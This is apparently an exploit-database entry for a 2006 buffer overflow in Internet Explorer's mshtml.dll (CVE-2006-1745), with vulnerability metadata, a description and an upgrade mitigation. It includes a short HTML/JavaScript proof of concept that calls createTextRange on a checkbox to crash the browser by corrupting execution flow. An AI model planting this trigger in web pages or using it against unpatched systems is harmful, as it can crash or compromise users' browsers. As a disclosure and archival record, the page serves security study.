header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
Stelian Ene
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Internet Explorer
Affected Version From: 6.0.2900.2802
Affected Version To: 6.0.3790.0
Patch Exists: YES
Related CWE: CVE-2006-1745
CPE: a:microsoft:internet_explorer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2, Windows Server 2003
2006

MSHTML.DLL IE Buffer Overflow

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. Authentication is not required to exploit this vulnerability. The specific flaw exists within the mshtml.dll component of Internet Explorer. The vulnerability is due to a boundary error when processing a specially crafted HTML page. An attacker can leverage this vulnerability to execute arbitrary code under the context of the user running Internet Explorer.

Mitigation:

Upgrade to the latest version of Internet Explorer
Source

Exploit-DB raw data:

<!--
Stelian Ene:

I can't find any info on this delicious IE bug, but it seems to be publicly known:

It will badly access a (virtual?) pointer table, making EIP to jump at a random
address. This has various effects on the system I've tested with, including
crashing. It works on these versions of mshtml.dll:
XP SP2: 6.0.2900.2802 - latest
WS2003: 6.0.3790.0
-->

<input type="checkbox" id='c'>
<script>
        r=document.getElementById("c");
        a=r.createTextRange();
</script>

# milw0rm.com [2006-03-22]

Navigation

Suggest Exploit

Services By CQR